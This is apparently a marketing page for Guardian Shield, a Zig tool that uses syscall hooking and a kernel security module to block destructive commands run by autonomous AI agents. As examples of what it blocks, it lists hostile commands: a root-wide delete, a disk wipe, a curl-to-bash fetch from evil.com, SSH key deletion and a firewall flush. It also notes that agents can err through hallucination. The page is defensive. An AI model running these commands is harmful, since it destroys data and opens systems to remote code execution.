Guardian Shield

Multi-Layer Security for AI Agent Execution

Written in Zig

Kernel-level enforcement

Open source

The Problem with Autonomous AI Agents

AI agents can execute system commands autonomously—which is powerful, but potentially catastrophic if unchecked

Without proper safeguards

A single mistake could result in complete system compromise

rm -rf / --no-preserve-rootComplete system deletion

dd if=/dev/zero of=/dev/sdaDisk wiping

chmod -R 777 /Security compromise

curl http://evil.com/script.sh | bashRemote code execution

One hallucination, bug, or misunderstood context, and your system is compromised. Guardian Shield prevents this.

How It Works: Defense in Depth

Guardian Shield uses multiple enforcement layers to validate every command before execution

Layer 1: User-Space Interception

LD_PRELOAD-based syscall hooking

Intercepts commands at the application layer.

Hooks execve(), unlink(), open(), and other dangerous syscalls

Fast validation against security policy

Transparent to the application layer

Layer 2: Kernel-Level Enforcement

LSM (Linux Security Module) with BPF

Provides mandatory access control at the kernel level.

Enforces policy that user processes cannot bypass

Blocks privilege escalation attempts

Cannot be disabled by unprivileged processes

Layer 3: Filesystem Protection

Planned

Immutable filesystem overlays with copy-on-write semantics for critical directories.

Snapshot-based rollback capability

Protection for /etc, /boot, and other critical paths

Automatic recovery from corruption

What Gets Blocked vs. Allowed

Guardian Shield validates commands against a configurable security policy

Blocked by Guardian Shield

Dangerous operations that will be intercepted and denied

rm -rf /home/user/.ssh

❌ Deleted SSH keys

sudo passwd root

❌ Privilege escalation attempt

mkfs.ext4 /dev/sda1

❌ Filesystem formatting blocked

iptables -F

❌ Firewall flush denied

Allowed by Guardian Shield

Safe operations that pass validation checks

systemctl restart nginx

✅ Safe service restart

apt update && apt upgrade -y

✅ System updates allowed

chown www-data:www-data /var/www

✅ Safe permission change

journalctl -u sshd.service

✅ Read-only log access

Integration with Aegis Shield

Guardian Shield enables safe autonomous remediation in Aegis Shield

Two Remediation Modes

Manual Mode

Download bash scripts, review every command, execute yourself.

→ Guardian Shield: Optional

Agent Mode

Enable automated AI command execution with Guardian Shield protection.

→ Guardian Shield: Required

Without Guardian Shield, agent mode means trusting the AI with unrestricted system access. Guardian Shield makes autonomous execution safe.

Related Security Components

Guardian Shield is part of the JesterNet security ecosystem

Guardian Shield

Multi-layer command validation (this page)

zig-sentinel

Behavioral anomaly detection using eBPF

zig-jail

Syscall sandboxing with seccomp-BPF and namespace isolation

All projects are open source and written in Zig for performance and safety.

Get Started

Guardian Shield is integrated into Aegis Shield. Installation and configuration are available in your dashboard after signing up.